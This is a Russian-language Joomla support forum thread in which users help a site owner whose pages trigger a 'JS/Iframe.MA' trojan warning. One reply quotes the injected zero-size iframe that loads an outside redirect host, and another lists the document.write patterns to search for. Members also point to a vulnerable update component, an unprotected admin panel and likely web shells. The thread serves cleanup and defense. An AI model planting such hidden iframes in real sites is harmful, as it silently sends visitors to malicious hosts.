Форум русской поддержки Joomla!® CMS
10.12.2016, 14:51:02 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Угроза: JS/Iframe.MA троянская программа

 (Прочитано 1109 раз)
0 Пользователей и 1 Гость смотрят эту тему.
krizis
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« : 01.10.2015, 11:10:54 »

Здраствуйте, недели две назат столкнулся с такой проблемой сайт стал выдавать вирус "Угроза: JS/Iframe.MA троянская программа" антивирус eset smart "
кто подскажет как исправить проблемку эту, это у меня или на хосте-домене, сайт ссылка вырезана


« Последнее редактирование: 02.10.2015, 22:43:10 от era » Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #1 : 01.10.2015, 11:21:37 »

Какая версия Joomla и что установлено? Взломали походу.
Записан
krizis
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #2 : 01.10.2015, 12:08:50 »

Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #3 : 01.10.2015, 12:15:20 »

А шаблон включить стандартный пробовал?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #4 : 01.10.2015, 12:20:46 »

У вас фреймов в топе этих накидано хоть жоп...ой жуй, взломали однозначно! сливают трафик возможно на связку сплоитов.

Цитировать
<iframe width="0" height="0" src="http://c11n4.i.teaserguide.com/snitch?default_keyword=%D0%91%D0%B8%D0%B1%D0%BB%D0%B8%D0%BE%D1%82%D0%B5%D0%BA%D0%B8%20%D0%9D%D0%B5%D1%81%D1%82%D0%B5%D1%80%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%B3%D0%BE%20%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D0%B0&amp;referrer=&amp;se_referrer=&amp;source=bibliosistema.ru"></iframe>

P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
« Последнее редактирование: 01.10.2015, 12:28:18 от winstrool » Записан
krizis
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #5 : 02.10.2015, 10:18:22 »

а где фрейм прописывается кто подскажет не могу накопать
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #6 : 02.10.2015, 19:02:15 »

в яваскриптах.
Код:
document.write('<iframe
или
Код:
document.write("<scr"+"ipt
Записан
voland
Профи
********

Репутация: +488/-86
Online Online

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #7 : 02.10.2015, 22:32:43 »

Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Зачем так нагло врать?

Тут куча гадости стоит, сами же наставили вирусов, еще и ссылка на эту гадость!
Записан
krizis
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #8 : 03.10.2015, 10:51:41 »

я не вру, я только учусь. Простите если что не так
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #9 : 03.10.2015, 12:40:21 »

Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Так отвечайте на вопросы коректно, ни чего не ставили это означает что взяли пакет движка с Joomla.org и больше ни чего кроме него не ставили максимум языковой пакет, а у вас как у любого новичка/ученика помойка всего и вы считаете что ни чего больше не устанавливали.
В вашем случае или к специалистам обращаться или долго и упорно обучаться.
Записан
krizis
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #10 : 03.10.2015, 12:54:55 »

спасибо за комплимент
Записан
dr.red
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 58



« Ответ #11 : 03.10.2015, 16:51:45 »

В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #12 : 03.10.2015, 17:55:43 »

В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/
У вас под тегом <BODY> прописан js/frame убрать его можно с шаблона, ну и сразу же ищите шелы!
Записан
dr.red
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 58



« Ответ #13 : 28.11.2016, 04:08:39 »

Для того чтобы не было частых взломов рекомендуется обновлять движок до последней версии. Также при каждой установке нового дополнения проверить нету ли где-то нового JS.
Записан
dialit
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 71


« Ответ #14 : 28.11.2016, 09:53:02 »

Цитата: winstrool
P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
скажите, что значит бейсик авторизация?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3537


« Ответ #15 : 28.11.2016, 13:35:21 »

скажите, что значит бейсик авторизация?
то же самое что и Базовая HTTP-авторизация Basic Authorization
выставить можно из панели хостинга выбрав папку и назначив на неё ограничение с паролем
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet